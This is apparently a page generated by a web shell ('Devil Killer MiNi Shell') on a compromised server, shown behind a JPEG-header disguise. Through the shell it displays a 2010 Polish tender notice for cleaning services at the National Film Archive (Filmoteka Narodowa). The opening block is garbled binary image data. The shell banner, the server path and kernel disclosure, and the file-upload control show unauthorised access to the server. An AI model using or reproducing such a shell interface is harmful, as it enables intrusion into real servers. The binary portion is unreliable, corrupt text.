JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100428/101335-N-2010.html

<p class="kh_header"><b>Warszawa: UTRZYMANIE STANU CZYSTOŚCI W POMIESZCZENIACH I NA TERENIE FILMOTEKI NARODOWEJ.</b><br>
<b>Numer ogłoszenia: 101335 - 2010; data zamieszczenia: 28.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Filmoteka Narodowa , ul. Puławska 61, 00-975 Warszawa, woj. mazowieckie, tel. 022 8455074, faks 022 540 83 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.fn.org.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UTRZYMANIE STANU CZYSTOŚCI W POMIESZCZENIACH I NA TERENIE FILMOTEKI NARODOWEJ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje sprzątanie następujących obiektów:
1) Archiwum Filmowe Wałbrzyska, ul. Wałbrzyska 6/12 w Warszawie, Archiwum Filmowe Chełmska ul. Chełmska 21 w Warszawie, Filmoteki Narodowej, ul. Puławska 61 w Warszawie,
2) Kina ILUZJON, ul. Narbutta 50 A w Warszawie,
3) Oddziału Łódzkiego Filmoteki Narodowej w Łodzi, ul. Łąkowa 29.

Na usługi sprzątania składa się w szczególności:
-	mycie i dezynfekcja urządzeń sanitarnych,
-	mycie podłóg,
-	opróżnianie pojemników na śmieci, usuwanie worków z odpadami,
-	czyszczenie powierzchni biurek, stołów, szaf, parapetów, telefonów,
-	mycie luster, powierzchni szklanych,
-	uzupełnianie mydła, ręczników papierowych i papieru toaletowego,
-	opróżnianie i mycie popielniczek,
-	zamiatanie chodników i ulic, utrzymanie terenów zielonych w czystości,
-	utrzymanie sprawności kratek ściekowych,
- usuwanie śniegu z chodników, ciągów komunikacyjnych i dróg,
- koszenie trawy,
- czyszczenie rynien.

Zamówienie składa się z trzech części:

Zadanie nr 1 (Część nr 1).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje Archiwum Filmowe Wałbrzyska, ul. Wałbrzyska 6/12 w Warszawie, Archiwum Filmowe Chełmska ul. Chełmska 21 w Warszawie, Filmoteki Narodowej, ul. Puławska 61 w Warszawie.

Zadanie nr 2 (Część nr 2).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje sprzątanie Kina ILUZJON, ul. Narbutta 50 A w Warszawie.

Zadanie nr 3 (Część nr 3).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje sprzątanie Oddziału Łódzkiego Filmoteki Narodowej w Łodzi, ul. Łąkowa 29.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.92.00-4, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące: 
1) posiadania uprawnień do wykonywania określonej działalności lub  czynności, jeżeli  przepisy prawa nakładają obowiązek ich posiadania; 
2) posiadania wiedzy i doświadczenia; 
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
4) sytuacji ekonomicznej i finansowej.  

2. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej przez Wykonawcę za zgodność z oryginałem. Wykonawcy składają oświadczenia wyłącznie w formie oryginału.

3. Za spełniających warunki udziału w postępowaniu Zamawiający uzna Wykonawców, którzy złożą oświadczenie o spełnianiu warunków udziału w postępowaniu oraz:

Zadanie nr 1:
- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali co najmniej trzy usługi obejmujące sprzątanie budynków biurowych lub magazynowych o wartości łącznej nie mniejszej niż 150 000 zł brutto.

Zadanie nr 2:
- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali co najmniej dwie usługi obejmujące sprzątanie budynków biurowych lub magazynowych o wartości łącznej nie mniejszej niż 50 000 zł brutto.

Zadanie nr 3:
- wykażą, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - należycie zrealizowali co najmniej trzy usługi obejmujące sprzątanie budynków biurowych lub magazynowych o wartości łącznej nie mniejszej niż 100 000 zł brutto.

4. Wykonawca jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert, spełnianie warunków udziału w postępowaniu, o których mowa powyżej oraz  brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 PZP - lista dokumentów potwierdzających brak podstaw do wykluczenia z postępowania zawarta została w sekcji III.4.2 ogłoszenia.

5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.fn.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa, Sekretariat, pokój 101 - I piętro.
Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 9-16..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2010 godzina 10:00, miejsce: Filmoteka Narodowa, ul. Puławska 61, 00-975 Warszawa, Sekretariat, pokój 101 - I piętro.
Sekretariat Zamawiającego pracuje w dni robocze od poniedziałku do piątku w godzinach 9-16..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> UTRZYMANIE STANU CZYSTOŚCI W POMIESZCZENIACH I NA TERENIE ARCHIWUM FILMOWEGO WAŁBRZYSKA, UL. WAŁBRZYSKA 6/12 W WARSZAWIE, ARCHIWUM FILMOWEGO CHEŁMSKA UL. CHEŁMSKA 21 W WARSZAWIE, FILMOTEKI NARODOWEJ, UL. PUŁAWSKA 61 W WARSZAWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 (Część nr 1).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje Archiwum Filmowe Wałbrzyska, ul. Wałbrzyska 6/12 w Warszawie, Archiwum Filmowe Chełmska ul. Chełmska 21 w Warszawie, Filmoteki Narodowej, ul. Puławska 61 w Warszawie,

Zakres usług:
1.	ul. Wałbrzyska 6/12
1.1.	Powierzchnie objęte usługami:
Wewnętrzne 					(łącznie 1685,0 m2):
-	pomieszczenia biurowe 			502,4 m2
-	korytarz główny 				131,0 m2
-	piwnice i boksy magazynowe 		1051,6 m2
Zewnętrzne 		(łącznie 9152,0 m2):
-	chodniki i ulice  				3547,0 m2
-	trawniki 	 				3413,0 m2 
 -     ogrodzony plac od ul. Wałbrzyskiej	2192,0 m2
Dodatkowe:
-	ciągi wentylacyjne i elektryczne  		84,0 m2
-	rynny dachowe  				320,0 m2
-	powierzchnia okien 			165,0 m2
1.2.	Zakres usług obejmuje:
Sprzątanie powierzchni wewnętrznych:
-	codzienne (pomieszczenia biurowe, korytarz główny, sanitariaty);
-	okresowe (piwnice, boksy magazynowe, mycie okien).
Sprzątanie terenu zewnętrznego:
-	codzienne (chodniki, ulice);
-	okresowe (strzyżenie trawników, czyszczenie rynien dachowych).
1.3.	Częstotliwości i szczegółowy opis wykonywanych czynności:
Prace wykonywane codziennie:
-	mycie i dezynfekcja urządzeń sanitarnych (umywalek, zlewów, WC );
-	mycie podłóg;
-	opróżnianie pojemników na śmieci, usuwanie worków z odpadami,;
-	czyszczenie powierzchni biurek, stołów, szaf, parapetów, telefonów;
-	mycie luster, powierzchni szklanych;
-	uzupełnianie mydła, ręczników papierowych i papieru toaletowego w toaletach;
-	opróżnianie i mycie popielniczek;
-	zamiatanie chodników i ulic, utrzymanie terenów zielonych w czystości;
-	utrzymanie sprawności kratek ściekowych.
Prace wykonywane raz w tygodniu:
-	mycie podłogi w korytarzu głównym na parterze.
Prace wykonywane raz w miesiącu:
-	zamiatanie i mycie podłóg na mokro w piwnicach i boksach magazynowych;
-	mycie drzwi, barierek i poręczy;
-	koszenie trawy (w okresie wiosenno-jesiennym).
-	czyszczenie rynien i dachu budynku.
Prace wykonywane raz na dwa miesiące (w okresie IV - XI):
    - sprzątanie ogrodzonego placu od ul. Wałbrzyskiej (koszenie trawy, zgrabienie)
Prace wykonywane raz na kwartał:
-	czyszczenie i odkurzanie listew elektrycznych, ciągów wentylacyjnych w boksach i korytarzach;
Prace wykonywane dwa razy w roku (na wezwanie Zamawiającego):
-	mycie okien we wszystkich pomieszczeniach.
Prace wykonywane w okresie zimowym - z częstotliwością gwarantującą czystość i bezpieczeństwo użytkowników (Wykonawca ponosi pełną odpowiedzialność za szkody spowodowane nienależytym wykonaniem usługi):
-	usuwanie śniegu i gołoledzi z chodników, ciągów komunikacyjnych i dróg;
-	posypywanie chodników mieszanką piasku i soli lub preparatów chemicznych;
-	utrzymanie sprawności kratek ściekowych.
2.	ul. Chełmska 21
2.1.	Powierzchnie objęte usługami:
Wewnętrzne 				(łącznie 1139,0 m2):
-	pomieszczenia biurowe  		622,80 m2
-	pozostałe pomieszczenia  		516,20 m2
Dodatkowe:
-	powierzchnia okien  		233,40 m2
2.2.	Zakres usług obejmuje:
-	sprzątanie codzienne - 929,80 m2 - pomieszczeń biurowych, korytarzy, sanitariatów;
-	sprzątanie raz w tygodniu - 92,20 m2 - wskazanych pomieszczeń - zakres wykonywanych prac jak przy sprzątaniu codziennym pomieszczeń biurowych.
-	sprzątanie raz na 2 tygodnie - 117,00 m2- wskazanych pomieszczeń - zakres wykonywanych prac jak przy sprzątaniu codziennym pomieszczeń biurowych.
      2.3. Częstotliwości i szczegółowy opis wykonywanych czynności.:
Prace wykonywane codziennie:
-	mycie i dezynfekcja urządzeń sanitarnych (umywalek, zlewów, WC );
-	zamiatanie, mycie i odkurzanie podłóg;
-	opróżnianie pojemników na śmieci, usuwanie worków z odpadami;
-	czyszczenie powierzchni biurek, stołów, blatów, parapetów;
-	mycie luster, powierzchni szklanych (m.in. szyb w drzwiach wejściowych do budynku);
-	uzupełnianie mydła, ręczników papierowych i papieru toaletowego w toaletach;
-	opróżnianie i mycie popielniczek.
Prace wykonywane raz w tygodniu:
-	odkurzanie mebli tapicerowanych;
Prace wykonywane raz w miesiącu:
-	mycie drzwi, barierek i poręczy;
-	odkurzanie lamp wiszących;
-	mycie mebli lakierowanych;
-	mycie glazury w sanitariatach.

Prace wykonywane dwa razy w roku (na wezwanie Zamawiającego):
-	mycie okien we wszystkich pomieszczeniach.
3.	ul. Puławska 61
3.1.	Powierzchnie objęte usługami:
-	powierzchnia okien  			541.91 m2
3.2.	Zakres usług obejmuje:
-	mycie okien.
3.3.	Częstotliwości i szczegółowy opis wykonywanych czynności:
-	dwa razy w roku na wezwanie Zamawiającego, mycie okien we wszystkich pomieszczeniach.

4. Dostarczane przez Zamawiającego:
-	mydło w płynie, ręczniki papierowe i papier toaletowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.92.00-4, 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> UTRZYMANIE STANU CZYSTOŚCI NA TERENIE KINA ILUZJON, UL. NARBUTTA 50 A W WARSZAWIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 (Część nr 2).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje sprzątanie Kina ILUZJON, ul. Narbutta 50 A w Warszawie.

1.	ul. Narbutta 50 A
1.1. Powierzchnie objęte usługami:	
	- chodniki i ulice				983 m2
1.2. Zakres usług obejmuje:
- codzienne zamiatanie chodników i ulic 
	- oczyszczanie kratek ściekowych
       1.3. w okresie zimowym: z częstotliwością gwarantującą czystość i bezpieczeństwo użytkowników (Wykonawca ponosi pełną odpowiedzialność za szkody spowodowane nienależytym wykonaniem usługi):   
- usuwanie śniegu i gołoledzi z chodników i ciągów komunikacyjnych
-	posypywanie chodników mieszanką piasku i soli lub preparatów chemicznych
-	utrzymanie sprawności kratek ściekowych.
2.   Materiały niezbędne do wykonania zamówienia:
2.1	Dostarczane przez Wykonawcę:
-	worki na śmieci - bardzo mocne, czarne, 35 i 60 L,
-	środki do mycia i dezynfekcji - proszki, płyny, żele,
-	pozostałe środki myjąco-czyszczące,
-	piasek + sól lub dopuszczone środki chemiczne,
-	kosiarka oraz dmuchawa do liści..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.12.00-8, 90.61.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> UTRZYMANIE STANU CZYSTOŚCI W POMIESZCZENIACH I NA TERENIE ODDZIAŁU ŁÓDZKIEGO FILMOTEKI NARODOWEJ W ŁODZI, UL. ŁĄKOWA 29.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 (Część nr 3).
Przedmiotem zamówienia jest wykonywanie usług sprzątania dla Filmoteki Narodowej. Przedmiot zamówienia obejmuje sprzątanie Oddziału Łódzkiego Filmoteki Narodowej w Łodzi, ul. Łąkowa 29.

Zakres usług:
1. Zakres usług obejmuje:
Sprzątanie powierzchni wewnętrznych:
-	codzienne (pomieszczenia biurowe, korytarz główny, sanitariaty);
-	okresowe (pomieszczenia magazynowe, mycie okien).
Sprzątanie terenu zewnętrznego:
-	codzienne (chodniki, ulice);
-	okresowe (strzyżenie trawników, czyszczenie rynien dachowych).
Prace sezonowe :
-	usuwanie śniegu i gołoledzi z chodników, ciągów komunikacyjnych i dróg
-	usuwanie opadłych liści, 

2. Powierzchnie objęte usługami:
Wewnętrzne 					(łącznie 2.118,7 m2):
-	pomieszczenia administracyjno-biurowe 	  583,7 m2
-	korytarze					  173,0 m2
-	pomieszczenia magazynowe 		1362,0 m2
Zewnętrzne 					(łącznie 2.102,0 m2):
-	chodniki i ulice  				1302,0 m2
-	trawniki 	 				  800,0 m2 
Dodatkowe:
-	rynny dachowe  				120,0 m2
-	powierzchnia okien 			  84,6 m2

3. Częstotliwości i szczegółowy opis wykonywanych czynności:
3.1 Prace wykonywane codziennie:
-	mycie i dezynfekcja urządzeń sanitarnych (umywalek, zlewów, WC );
-	mycie podłóg;
-	opróżnianie pojemników na śmieci, usuwanie worków z odpadami,;
-	czyszczenie powierzchni biurek, stołów, szaf, parapetów, telefonów;
-	mycie luster, powierzchni szklanych;
-	uzupełnianie mydła, ręczników papierowych i papieru toaletowego w toaletach;
-	zamiatanie chodników i ulic, utrzymanie terenów zielonych w czystości;
-	utrzymanie sprawności kratek ściekowych.

3.2 Prace wykonywane dwa razy w tygodniu:
-	mycie podłóg w korytarzach

3.3 Prace wykonywane raz w miesiącu:
-	zamiatanie i mycie podłóg na mokro w pomieszczeniach magazynowych;
-	mycie drzwi, barierek i poręczy;
-	koszenie trawy (w okresie od wiosny do jesieni) wraz z usuwaniem trawy z trawników,
-	czyszczenie rynien i dachu budynku.

3.4 Prace wykonywane raz na kwartał:
-	czyszczenie i odkurzanie listew elektrycznych, ciągów wentylacyjnych w boksach
-	i korytarzach;

3.5 Prace wykonywane dwa razy w roku (na wezwanie Zamawiającego):
-	mycie okien we wszystkich pomieszczeniach.

3.6 Prace wykonywane w okresie zimowym - z częstotliwością gwarantującą czystość i bezpieczeństwo użytkowników (Wykonawca ponosi pełną odpowiedzialność za szkody spowodowane nienależytym wykonaniem usługi):
-	usuwanie śniegu i gołoledzi z chodników, ciągów komunikacyjnych i dróg;
-	posypywanie chodników mieszanką piasku i soli lub preparatów chemicznych;
-	utrzymanie sprawności kratek ściekowych.

